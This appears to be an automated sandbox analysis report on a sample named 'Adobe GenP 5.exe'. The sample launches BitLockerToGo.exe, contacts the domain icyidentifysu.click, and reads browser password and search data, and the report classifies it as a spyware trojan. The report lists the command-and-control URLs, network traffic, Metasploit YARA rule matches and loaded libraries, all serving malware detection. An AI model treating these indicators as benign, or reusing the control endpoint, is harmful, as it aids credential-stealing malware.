            Source: BitLockerToGo.exe, 00000003.00000003.2426192936.000000000591D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: BitLockerToGo.exe, 00000003.00000003.2476797050.0000000003574000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356694769.0000000003574000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2517419497.0000000003574000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
            Source: BitLockerToGo.exe, 00000003.00000003.2426192936.000000000591D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: BitLockerToGo.exe, 00000003.00000003.2426192936.000000000591D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: BitLockerToGo.exe, 00000003.00000003.2426192936.000000000591D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: BitLockerToGo.exe, 00000003.00000003.2426192936.000000000591D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: BitLockerToGo.exe, 00000003.00000003.2426192936.000000000591D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: BitLockerToGo.exe, 00000003.00000003.2426192936.000000000591D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: BitLockerToGo.exe, 00000003.00000003.2426192936.000000000591D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: BitLockerToGo.exe, 00000003.00000003.2426192936.000000000591D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: BitLockerToGo.exe, 00000003.00000003.2426192936.000000000591D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: BitLockerToGo.exe, 00000003.00000003.2357591852.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357506334.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357439607.000000000584C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: BitLockerToGo.exe, 00000003.00000003.2427568126.00000000058A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
            Source: BitLockerToGo.exe, 00000003.00000003.2427568126.00000000058A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
            Source: BitLockerToGo.exe, 00000003.00000003.2357591852.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357506334.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357439607.000000000584C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: BitLockerToGo.exe, 00000003.00000003.2357591852.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357506334.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357439607.000000000584C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: BitLockerToGo.exe, 00000003.00000003.2357591852.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357506334.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357439607.000000000584C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: BitLockerToGo.exe, 00000003.00000003.2427568126.00000000058A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
            Source: BitLockerToGo.exe, 00000003.00000003.2427568126.00000000058A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
            Source: BitLockerToGo.exe, 00000003.00000003.2357591852.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357506334.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357439607.000000000584C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: BitLockerToGo.exe, 00000003.00000003.2357591852.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357506334.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357439607.000000000584C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: BitLockerToGo.exe, 00000003.00000003.2357591852.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357506334.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357439607.000000000584C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: Adobe GenP 5.exeString found in binary or memory: https://github.com/zloirock/core-js
            Source: Adobe GenP 5.exeString found in binary or memory: https://github.com/zloirock/core-js/blob/v3.20.3/LICENSE
            Source: BitLockerToGo.exe, 00000003.00000003.2609531929.00000000035D0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2609625535.000000000356A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356694769.0000000003574000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2610591925.000000000356B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2610702949.00000000035D0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2609550259.0000000003568000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2609186607.00000000035D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://icyidentifysu.click/
            Source: BitLockerToGo.exe, 00000003.00000003.2476797050.0000000003574000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://icyidentifysu.click/8Nr
            Source: BitLockerToGo.exe, 00000003.00000003.2356694769.0000000003574000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://icyidentifysu.click/YF
            Source: BitLockerToGo.exe, 00000003.00000003.2493579531.00000000035E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2517419497.000000000356A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://icyidentifysu.click/api
            Source: BitLockerToGo.exe, 00000003.00000003.2609625535.0000000003574000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2610591925.0000000003574000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2517419497.0000000003574000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://icyidentifysu.click/ck/8Nr
            Source: BitLockerToGo.exe, 00000003.00000003.2356694769.0000000003574000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://icyidentifysu.click/nF
            Source: BitLockerToGo.exe, 00000003.00000003.2609531929.00000000035D0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356694769.0000000003574000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2610702949.00000000035D0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2609186607.00000000035D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://icyidentifysu.click/pi
            Source: BitLockerToGo.exe, 00000003.00000003.2609531929.00000000035D0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2609186607.00000000035D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://icyidentifysu.click/piv
            Source: BitLockerToGo.exe, 00000003.00000003.2609625535.000000000356A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2425451359.0000000005894000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2610591925.000000000356B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2379523620.0000000005889000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2609550259.0000000003568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://icyidentifysu.click:443/api
            Source: BitLockerToGo.exe, 00000003.00000003.2427568126.00000000058A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
            Source: BitLockerToGo.exe, 00000003.00000003.2427246550.0000000005B33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: BitLockerToGo.exe, 00000003.00000003.2427246550.0000000005B33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: BitLockerToGo.exe, 00000003.00000003.2427568126.00000000058A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
            Source: BitLockerToGo.exe, 00000003.00000003.2427568126.00000000058A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
            Source: BitLockerToGo.exe, 00000003.00000003.2357591852.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357506334.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357439607.000000000584C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: BitLockerToGo.exe, 00000003.00000003.2357591852.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357506334.0000000005849000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357439607.000000000584C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: BitLockerToGo.exe, 00000003.00000003.2427246550.0000000005B33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
            Source: BitLockerToGo.exe, 00000003.00000003.2427246550.0000000005B33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
            Source: BitLockerToGo.exe, 00000003.00000003.2427246550.0000000005B33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: BitLockerToGo.exe, 00000003.00000003.2427246550.0000000005B33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: BitLockerToGo.exe, 00000003.00000003.2427246550.0000000005B33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
            Source: BitLockerToGo.exe, 00000003.00000003.2427246550.0000000005B33000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
            Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
            Source: unknownHTTPS traffic detected: 104.21.29.252:443 -> 192.168.2.5:49725 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.29.252:443 -> 192.168.2.5:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.29.252:443 -> 192.168.2.5:49742 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.29.252:443 -> 192.168.2.5:49748 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.29.252:443 -> 192.168.2.5:49759 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.29.252:443 -> 192.168.2.5:49765 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.29.252:443 -> 192.168.2.5:49771 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.29.252:443 -> 192.168.2.5:49781 version: TLS 1.2

            System Summary

            barindex
            Source: 00000000.00000002.2310216915.000000000AE80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
            Source: 00000000.00000002.2310776898.000000000B000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042A03C3_2_0042A03C
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004350903_2_00435090
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004381103_2_00438110
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040E2D53_2_0040E2D5
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004253A03_2_004253A0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004353A03_2_004353A0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0043C4103_2_0043C410
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040D49A3_2_0040D49A
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004086903_2_00408690
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042A7493_2_0042A749
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004207203_2_00420720
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040B9AF3_2_0040B9AF
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0043CCD03_2_0043CCD0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040CF2B3_2_0040CF2B
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004120103_2_00412010
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004340EF3_2_004340EF
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004160F13_2_004160F1
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0041D1703_2_0041D170
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004092703_2_00409270
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0041C2003_2_0041C200
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004062303_2_00406230
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004282E83_2_004282E8
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004043003_2_00404300
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042D32A3_2_0042D32A
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004213803_2_00421380
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042E4403_2_0042E440
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004264003_2_00426400
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042B4293_2_0042B429
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004194903_2_00419490
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004074A03_2_004074A0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0041D4B03_2_0041D4B0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004096303_2_00409630
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004066C03_2_004066C0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0041D6F03_2_0041D6F0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0043C6A03_2_0043C6A0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0041876C3_2_0041876C
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040D7383_2_0040D738
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0041E7F03_2_0041E7F0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0041A7903_2_0041A790
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004348703_2_00434870
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040C8303_2_0040C830
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004158D63_2_004158D6
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004059403_2_00405940
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004039503_2_00403950
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0043395D3_2_0043395D
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042A9C43_2_0042A9C4
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_004389F03_2_004389F0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0043C9903_2_0043C990
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040A9B03_2_0040A9B0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0041CA403_2_0041CA40
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042AA623_2_0042AA62
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00434AD03_2_00434AD0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00418BE73_2_00418BE7
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00402B903_2_00402B90
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0040FC0A3_2_0040FC0A
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00404C303_2_00404C30
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00414D453_2_00414D45
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0041CD603_2_0041CD60
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_0042FD603_2_0042FD60
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00435E403_2_00435E40
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00414D403_2_00414D40
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00429ECA3_2_00429ECA
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00405E903_2_00405E90
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00402F403_2_00402F40
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00408FE03_2_00408FE0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 3_2_00420FA03_2_00420FA0
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 004145B0 appears 76 times
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: String function: 00407FE0 appears 76 times
            Source: Adobe GenP 5.exe, 00000000.00000003.2243124589.000000000B168000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs Adobe GenP 5.exe
            Source: Adobe GenP 5.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
            Source: 00000000.00000002.2310216915.000000000AE80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
            Source: 00000000.00000002.2310776898.000000000B000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/0@1/1
            Source: Adobe GenP 5.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Adobe GenP 5.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: BitLockerToGo.exe, 00000003.00000003.2357888120.000000000581A000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357731348.0000000005837000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2384042731.00000000058B1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2383075935.000000000581C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Adobe GenP 5.exeVirustotal: Detection: 37%
            Source: Adobe GenP 5.exeReversingLabs: Detection: 44%
            Source: Adobe GenP 5.exeString found in binary or memory: @v1.5.6/loadconfig.go
            Source: unknownProcess created: C:\Users\user\Desktop\Adobe GenP 5.exe "C:\Users\user\Desktop\Adobe GenP 5.exe"
            Source: C:\Users\user\Desktop\Adobe GenP 5.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
            Source: C:\Users\user\Desktop\Adobe GenP 5.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Adobe GenP 5.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Adobe GenP 5.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Adobe GenP 5.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Users\user\Desktop\Adobe GenP 5.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: uxtheme.dllJump to behavior
